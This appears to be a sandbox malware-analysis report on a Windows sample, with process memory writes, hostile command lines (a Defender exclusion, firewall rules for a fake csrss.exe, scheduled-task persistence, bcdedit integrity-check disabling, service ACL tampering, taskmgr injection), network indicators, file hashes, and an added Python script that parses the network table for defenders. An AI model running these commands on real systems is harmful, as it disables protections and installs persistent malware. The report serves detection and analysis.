Token: SeSystemEnvironmentPrivilege N/A C:\Windows\rss\csrss.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\sc.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\sc.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2220 wrote to memory of 2580 N/A C:\Users\Admin\AppData\Local\Temp\d6078bbecc15a333c6171debc4488498.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2220 wrote to memory of 2580 N/A C:\Users\Admin\AppData\Local\Temp\d6078bbecc15a333c6171debc4488498.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2220 wrote to memory of 2580 N/A C:\Users\Admin\AppData\Local\Temp\d6078bbecc15a333c6171debc4488498.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2220 wrote to memory of 2572 N/A C:\Users\Admin\AppData\Local\Temp\d6078bbecc15a333c6171debc4488498.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
PID 2220 wrote to memory of 2572 N/A C:\Users\Admin\AppData\Local\Temp\d6078bbecc15a333c6171debc4488498.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
PID 2220 wrote to memory of 2572 N/A C:\Users\Admin\AppData\Local\Temp\d6078bbecc15a333c6171debc4488498.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
PID 2220 wrote to memory of 2572 N/A C:\Users\Admin\AppData\Local\Temp\d6078bbecc15a333c6171debc4488498.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
PID 2220 wrote to memory of 2572 N/A C:\Users\Admin\AppData\Local\Temp\d6078bbecc15a333c6171debc4488498.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
PID 2220 wrote to memory of 2572 N/A C:\Users\Admin\AppData\Local\Temp\d6078bbecc15a333c6171debc4488498.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
PID 2220 wrote to memory of 2572 N/A C:\Users\Admin\AppData\Local\Temp\d6078bbecc15a333c6171debc4488498.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
PID 2220 wrote to memory of 2572 N/A C:\Users\Admin\AppData\Local\Temp\d6078bbecc15a333c6171debc4488498.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
PID 2220 wrote to memory of 2572 N/A C:\Users\Admin\AppData\Local\Temp\d6078bbecc15a333c6171debc4488498.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
PID 2220 wrote to memory of 2400 N/A C:\Users\Admin\AppData\Local\Temp\d6078bbecc15a333c6171debc4488498.exe C:\Windows\system32\WerFault.exe
PID 2220 wrote to memory of 2400 N/A C:\Users\Admin\AppData\Local\Temp\d6078bbecc15a333c6171debc4488498.exe C:\Windows\system32\WerFault.exe
PID 2220 wrote to memory of 2400 N/A C:\Users\Admin\AppData\Local\Temp\d6078bbecc15a333c6171debc4488498.exe C:\Windows\system32\WerFault.exe
PID 2572 wrote to memory of 2832 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\43h0dr9a9tbyx7RO1lNQLEny.exe
PID 2572 wrote to memory of 2832 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\43h0dr9a9tbyx7RO1lNQLEny.exe
PID 2572 wrote to memory of 2832 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\43h0dr9a9tbyx7RO1lNQLEny.exe
PID 2572 wrote to memory of 2832 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\43h0dr9a9tbyx7RO1lNQLEny.exe
PID 2572 wrote to memory of 856 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\beDDjjTIDeI98VjRRBBHYRkc.exe
PID 2572 wrote to memory of 856 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\beDDjjTIDeI98VjRRBBHYRkc.exe
PID 2572 wrote to memory of 856 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\beDDjjTIDeI98VjRRBBHYRkc.exe
PID 2572 wrote to memory of 856 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\beDDjjTIDeI98VjRRBBHYRkc.exe
PID 2572 wrote to memory of 1824 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\00fKWSRoAerNWHLuZOUwTWLf.exe
PID 2572 wrote to memory of 1824 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\00fKWSRoAerNWHLuZOUwTWLf.exe
PID 2572 wrote to memory of 1824 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\00fKWSRoAerNWHLuZOUwTWLf.exe
PID 2572 wrote to memory of 1824 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\00fKWSRoAerNWHLuZOUwTWLf.exe
PID 2572 wrote to memory of 2204 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe
PID 2572 wrote to memory of 2204 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe
PID 2572 wrote to memory of 2204 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe
PID 2572 wrote to memory of 2204 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe
PID 2572 wrote to memory of 980 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\dSRtB270COtELwP0avgpGVnT.exe
PID 2572 wrote to memory of 980 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\dSRtB270COtELwP0avgpGVnT.exe
PID 2572 wrote to memory of 980 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\dSRtB270COtELwP0avgpGVnT.exe
PID 2572 wrote to memory of 980 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\dSRtB270COtELwP0avgpGVnT.exe
PID 2572 wrote to memory of 2484 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\Sumv9e2zZTPfbr2KJrMWLNxW.exe
PID 2572 wrote to memory of 2484 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\Sumv9e2zZTPfbr2KJrMWLNxW.exe
PID 2572 wrote to memory of 2484 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\Sumv9e2zZTPfbr2KJrMWLNxW.exe
PID 2572 wrote to memory of 2484 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\Sumv9e2zZTPfbr2KJrMWLNxW.exe
PID 2832 wrote to memory of 2140 N/A C:\Users\Admin\Pictures\43h0dr9a9tbyx7RO1lNQLEny.exe C:\Users\Admin\AppData\Local\Temp\u26o.0.exe
PID 2832 wrote to memory of 2140 N/A C:\Users\Admin\Pictures\43h0dr9a9tbyx7RO1lNQLEny.exe C:\Users\Admin\AppData\Local\Temp\u26o.0.exe
PID 2832 wrote to memory of 2140 N/A C:\Users\Admin\Pictures\43h0dr9a9tbyx7RO1lNQLEny.exe C:\Users\Admin\AppData\Local\Temp\u26o.0.exe
PID 2832 wrote to memory of 2140 N/A C:\Users\Admin\Pictures\43h0dr9a9tbyx7RO1lNQLEny.exe C:\Users\Admin\AppData\Local\Temp\u26o.0.exe
PID 2832 wrote to memory of 908 N/A C:\Users\Admin\Pictures\43h0dr9a9tbyx7RO1lNQLEny.exe C:\Users\Admin\AppData\Local\Temp\u26o.1.exe
PID 2832 wrote to memory of 908 N/A C:\Users\Admin\Pictures\43h0dr9a9tbyx7RO1lNQLEny.exe C:\Users\Admin\AppData\Local\Temp\u26o.1.exe
PID 2832 wrote to memory of 908 N/A C:\Users\Admin\Pictures\43h0dr9a9tbyx7RO1lNQLEny.exe C:\Users\Admin\AppData\Local\Temp\u26o.1.exe
PID 2832 wrote to memory of 908 N/A C:\Users\Admin\Pictures\43h0dr9a9tbyx7RO1lNQLEny.exe C:\Users\Admin\AppData\Local\Temp\u26o.1.exe
PID 2192 wrote to memory of 2092 N/A C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe C:\Windows\system32\cmd.exe
PID 2192 wrote to memory of 2092 N/A C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe C:\Windows\system32\cmd.exe
PID 2192 wrote to memory of 2092 N/A C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe C:\Windows\system32\cmd.exe
PID 2192 wrote to memory of 2092 N/A C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe C:\Windows\system32\cmd.exe
PID 1972 wrote to memory of 2640 N/A C:\Users\Admin\Pictures\00fKWSRoAerNWHLuZOUwTWLf.exe C:\Windows\system32\cmd.exe
PID 1972 wrote to memory of 2640 N/A C:\Users\Admin\Pictures\00fKWSRoAerNWHLuZOUwTWLf.exe C:\Windows\system32\cmd.exe
PID 1972 wrote to memory of 2640 N/A C:\Users\Admin\Pictures\00fKWSRoAerNWHLuZOUwTWLf.exe C:\Windows\system32\cmd.exe
PID 1972 wrote to memory of 2640 N/A C:\Users\Admin\Pictures\00fKWSRoAerNWHLuZOUwTWLf.exe C:\Windows\system32\cmd.exe
PID 2092 wrote to memory of 2536 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2092 wrote to memory of 2536 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2092 wrote to memory of 2536 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2680 wrote to memory of 572 N/A C:\Users\Admin\Pictures\Sumv9e2zZTPfbr2KJrMWLNxW.exe C:\Windows\system32\cmd.exe
PID 2680 wrote to memory of 572 N/A C:\Users\Admin\Pictures\Sumv9e2zZTPfbr2KJrMWLNxW.exe C:\Windows\system32\cmd.exe
PID 2680 wrote to memory of 572 N/A C:\Users\Admin\Pictures\Sumv9e2zZTPfbr2KJrMWLNxW.exe C:\Windows\system32\cmd.exe
PID 2680 wrote to memory of 572 N/A C:\Users\Admin\Pictures\Sumv9e2zZTPfbr2KJrMWLNxW.exe C:\Windows\system32\cmd.exe
PID 572 wrote to memory of 2128 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 572 wrote to memory of 2128 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe

System policy modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\d6078bbecc15a333c6171debc4488498.exe N/A

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\d6078bbecc15a333c6171debc4488498.exe

"C:\Users\Admin\AppData\Local\Temp\d6078bbecc15a333c6171debc4488498.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\d6078bbecc15a333c6171debc4488498.exe" -Force

C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 2220 -s 808

C:\Users\Admin\Pictures\43h0dr9a9tbyx7RO1lNQLEny.exe

"C:\Users\Admin\Pictures\43h0dr9a9tbyx7RO1lNQLEny.exe"

C:\Users\Admin\Pictures\beDDjjTIDeI98VjRRBBHYRkc.exe

"C:\Users\Admin\Pictures\beDDjjTIDeI98VjRRBBHYRkc.exe"

C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe

"C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe"

C:\Users\Admin\Pictures\00fKWSRoAerNWHLuZOUwTWLf.exe

"C:\Users\Admin\Pictures\00fKWSRoAerNWHLuZOUwTWLf.exe"

C:\Users\Admin\Pictures\dSRtB270COtELwP0avgpGVnT.exe

"C:\Users\Admin\Pictures\dSRtB270COtELwP0avgpGVnT.exe"

C:\Users\Admin\Pictures\Sumv9e2zZTPfbr2KJrMWLNxW.exe

"C:\Users\Admin\Pictures\Sumv9e2zZTPfbr2KJrMWLNxW.exe"

C:\Users\Admin\AppData\Local\Temp\u26o.0.exe

"C:\Users\Admin\AppData\Local\Temp\u26o.0.exe"

C:\Windows\system32\makecab.exe

"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20240510040523.log C:\Windows\Logs\CBS\CbsPersist_20240510040523.cab

C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe

"C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe"

C:\Users\Admin\Pictures\Sumv9e2zZTPfbr2KJrMWLNxW.exe

"C:\Users\Admin\Pictures\Sumv9e2zZTPfbr2KJrMWLNxW.exe"

C:\Users\Admin\Pictures\00fKWSRoAerNWHLuZOUwTWLf.exe

"C:\Users\Admin\Pictures\00fKWSRoAerNWHLuZOUwTWLf.exe"

C:\Users\Admin\Pictures\dSRtB270COtELwP0avgpGVnT.exe

"C:\Users\Admin\Pictures\dSRtB270COtELwP0avgpGVnT.exe"

C:\Users\Admin\AppData\Local\Temp\u26o.1.exe

"C:\Users\Admin\AppData\Local\Temp\u26o.1.exe"

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\system32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe

"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"

C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe

"C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -timeout 0

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}

C:\Windows\system32\bcdedit.exe

C:\Windows\Sysnative\bcdedit.exe /v

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\windefender.exe

"C:\Windows\windefender.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\SysWOW64\sc.exe

sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\windefender.exe

C:\Windows\windefender.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 yip.su udp
US 104.20.3.235:443 pastebin.com tcp
US 104.21.79.77:443 yip.su tcp
US 8.8.8.8:53 onlycitylink.com udp
US 8.8.8.8:53 realdeepai.org udp
US 8.8.8.8:53 avgmc.xyz udp
DE 185.172.128.59:80 185.172.128.59 tcp
RU 193.233.132.234:80 tcp
US 8.8.8.8:53 onlycitylink.com udp
RU 5.42.96.64:80 5.42.96.64 tcp
RU 193.233.132.234:80 tcp
US 8.8.8.8:53 realdeepai.org udp
US 104.21.90.14:443 realdeepai.org tcp
US 104.21.90.14:443 realdeepai.org tcp
US 172.67.182.192:443 onlycitylink.com tcp
US 172.67.182.192:443 onlycitylink.com tcp
RU 84.38.181.36:443 avgmc.xyz tcp
US 8.8.8.8:53 jonathantwo.com udp
US 8.8.8.8:53 jonathantwo.com udp
US 8.8.8.8:53 firstfirecar.com udp
US 8.8.8.8:53 firstfirecar.com udp
US 172.67.176.131:443 jonathantwo.com tcp
US 172.67.176.131:443 jonathantwo.com tcp
US 172.67.193.220:443 firstfirecar.com tcp
US 172.67.193.220:443 firstfirecar.com tcp
US 8.8.8.8:53 apps.identrust.com udp
US 8.8.8.8:53 apps.identrust.com udp
US 8.8.8.8:53 apps.identrust.com udp
US 2.18.190.81:80 apps.identrust.com tcp
US 2.18.190.80:80 apps.identrust.com tcp
US 2.18.190.80:80 apps.identrust.com tcp
US 2.18.190.81:80 apps.identrust.com tcp
DE 185.172.128.90:80 185.172.128.90 tcp
DE 185.172.128.228:80 185.172.128.228 tcp
GB 85.192.56.26:80 85.192.56.26 tcp
DE 185.172.128.59:80 185.172.128.59 tcp
DE 185.172.128.228:80 185.172.128.228 tcp
DE 185.172.128.150:80 185.172.128.150 tcp
US 8.8.8.8:53 api.myip.com udp
US 104.26.9.59:443 api.myip.com tcp
US 8.8.8.8:53 svc.iolo.com udp
US 20.157.87.45:80 svc.iolo.com tcp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.186.192:443 ipinfo.io tcp
US 34.117.186.192:443 ipinfo.io tcp
US 8.8.8.8:53 iplogger.com udp
US 172.67.188.178:443 iplogger.com tcp
US 8.8.8.8:53 download.iolo.net udp
US 8.8.8.8:53 a912424b-6149-45a7-bac9-5464d651c4d0.uuid.theupdatetime.org udp
FR 185.93.2.244:80 download.iolo.net tcp
US 8.8.8.8:53 msdl.microsoft.com udp
US 204.79.197.219:443 msdl.microsoft.com tcp
US 20.157.87.45:80 svc.iolo.com tcp
US 8.8.8.8:53 vsblobprodscussu5shard30.blob.core.windows.net udp
US 20.150.79.68:443 vsblobprodscussu5shard30.blob.core.windows.net tcp
US 8.8.8.8:53 westus2-2.in.applicationinsights.azure.com udp
US 20.9.155.145:443 westus2-2.in.applicationinsights.azure.com tcp
US 20.9.155.145:443 westus2-2.in.applicationinsights.azure.com tcp
US 8.8.8.8:53 vsblobprodscussu5shard20.blob.core.windows.net udp
US 8.8.8.8:53 westus2-2.in.applicationinsights.azure.com udp
US 20.150.38.228:443 vsblobprodscussu5shard20.blob.core.windows.net tcp
US 20.9.155.148:443 westus2-2.in.applicationinsights.azure.com tcp
US 20.9.155.148:443 westus2-2.in.applicationinsights.azure.com tcp
US 8.8.8.8:53 server3.theupdatetime.org udp
US 8.8.8.8:53 stun.sipgate.net udp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 15.197.250.192:3478 stun.sipgate.net udp
BG 185.82.216.108:443 server3.theupdatetime.org tcp
US 20.9.155.148:443 westus2-2.in.applicationinsights.azure.com tcp
US 8.8.8.8:53 carsalessystem.com udp
US 172.67.221.71:443 carsalessystem.com tcp
US 20.9.155.148:443 westus2-2.in.applicationinsights.azure.com tcp
BG 185.82.216.108:443 server3.theupdatetime.org tcp
US 8.8.8.8:53 westus2-2.in.applicationinsights.azure.com udp
US 20.9.155.148:443 westus2-2.in.applicationinsights.azure.com tcp
US 20.9.155.148:443 westus2-2.in.applicationinsights.azure.com tcp
BG 185.82.216.108:443 server3.theupdatetime.org tcp
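
The table above mixes resolver queries with the connections that followed them, and two rows (the port-80 connections to 193.233.132.234) have no Domain value at all. The Python below is an added example, not part of the report: it parses rows in this layout, tolerating the missing column, and builds the views an analyst actually wants from the table, namely which names resolved to which IPs, which connections carried no name, which were plaintext HTTP, and which names were queried but never contacted. The embedded rows are a subset copied from the table above; the THIRD_PARTY table reflects the report's own signatures for pastebin.com, ipinfo.io and api.myip.com, while the cdn.discordapp.com entry is an assumption of this example, not a finding of the report.

```python
import ipaddress
from collections import defaultdict

# A subset of rows copied from the Network table above, including the two rows
# that carry no Domain value (three columns) and one name that was only queried.
NETWORK_ROWS = """\
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 yip.su udp
US 104.20.3.235:443 pastebin.com tcp
US 104.21.79.77:443 yip.su tcp
DE 185.172.128.59:80 185.172.128.59 tcp
RU 193.233.132.234:80 tcp
RU 5.42.96.64:80 5.42.96.64 tcp
RU 193.233.132.234:80 tcp
US 8.8.8.8:53 api.myip.com udp
US 104.26.9.59:443 api.myip.com tcp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.186.192:443 ipinfo.io tcp
US 8.8.8.8:53 a912424b-6149-45a7-bac9-5464d651c4d0.uuid.theupdatetime.org udp
US 8.8.8.8:53 stun.sipgate.net udp
US 15.197.250.192:3478 stun.sipgate.net udp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.135.233:443 cdn.discordapp.com tcp
BG 185.82.216.108:443 server3.theupdatetime.org tcp
"""

# pastebin.com, ipinfo.io and api.myip.com are classified as the report's own
# signatures classify them; cdn.discordapp.com is an assumption of this example.
THIRD_PARTY = {"pastebin.com": "hosting", "cdn.discordapp.com": "hosting",
               "ipinfo.io": "ip-lookup", "api.myip.com": "ip-lookup"}


def parse_rows(text):
    """Parse 'Country Destination [Domain] Proto' rows; the Domain column may be empty."""
    events = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) not in (3, 4):
            continue
        ip, _, port = parts[1].rpartition(":")
        events.append({"country": parts[0], "ip": ip, "port": int(port),
                       "domain": parts[2] if len(parts) == 4 else "",
                       "proto": parts[-1].lower()})
    return events


def is_ip_literal(name):
    try:
        ipaddress.ip_address(name)
        return True
    except ValueError:
        return False


def pivot(events):
    """Name->IP map, nameless connections, plaintext HTTP, names queried but
    never contacted, and use of known third-party services."""
    queried, resolved = set(), defaultdict(set)
    direct_ip, plaintext = set(), set()
    for e in events:
        if e["proto"] == "udp" and e["port"] == 53:
            queried.add(e["domain"])          # DNS query: record the name, not the resolver
            continue
        if e["domain"] and not is_ip_literal(e["domain"]):
            resolved[e["domain"]].add(e["ip"])
        else:
            direct_ip.add(e["ip"])            # connection with no name attached
        if e["proto"] == "tcp" and e["port"] == 80:
            plaintext.add(e["ip"])
    return {
        "resolved": {d: sorted(ips) for d, ips in resolved.items()},
        "direct_ip": sorted(direct_ip),
        "plaintext_http": sorted(plaintext),
        "queried_only": sorted(queried - set(resolved)),
        "third_party": {d: THIRD_PARTY[d] for d in resolved if d in THIRD_PARTY},
    }


if __name__ == "__main__":
    for view, value in pivot(parse_rows(NETWORK_ROWS)).items():
        print(f"{view}: {value}")
```

The direct-to-IP plaintext HTTP hosts (185.172.128.x, 193.233.132.234, 5.42.96.64) are the pivots worth checking first on a proxy log, because nothing in DNS telemetry will show them. The queried-only set is useful in the other direction: a name that was resolved but never connected to usually means a dead or blocked endpoint, and in the full table above the per-host UUID label under theupdatetime.org is the only such name.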

Files

memory/2220-0-0x000007FEF5CA3000-0x000007FEF5CA4000-memory.dmp

memory/2220-1-0x0000000000E70000-0x0000000000E7A000-memory.dmp

memory/2220-2-0x00000000005B0000-0x000000000060E000-memory.dmp

memory/2220-3-0x000007FEF5CA0000-0x000007FEF668C000-memory.dmp

memory/2572-8-0x0000000000400000-0x0000000000408000-memory.dmp

memory/2572-10-0x0000000000400000-0x0000000000408000-memory.dmp

memory/2572-19-0x0000000000400000-0x0000000000408000-memory.dmp

memory/2580-20-0x0000000002E20000-0x0000000002EA0000-memory.dmp

memory/2572-18-0x0000000000400000-0x0000000000408000-memory.dmp

memory/2572-17-0x0000000000400000-0x0000000000408000-memory.dmp

memory/2572-16-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/2572-14-0x0000000000400000-0x0000000000408000-memory.dmp

memory/2572-12-0x0000000000400000-0x0000000000408000-memory.dmp

memory/2580-21-0x000000001B770000-0x000000001BA52000-memory.dmp

memory/2580-22-0x0000000000670000-0x0000000000678000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Cab34D8.tmp

MD5 ac05d27423a85adc1622c714f2cb6184
SHA1 b0fe2b1abddb97837ea0195be70ab2ff14d43198
SHA256 c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d
SHA512 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

C:\Users\Admin\AppData\Local\Temp\Tar34DB.tmp

MD5 9c0c641c06238516f27941aa1166d427
SHA1 64cd549fb8cf014fcd9312aa7a5b023847b6c977
SHA256 4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f
SHA512 936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

C:\Users\Admin\AppData\Local\Temp\Tar35BE.tmp

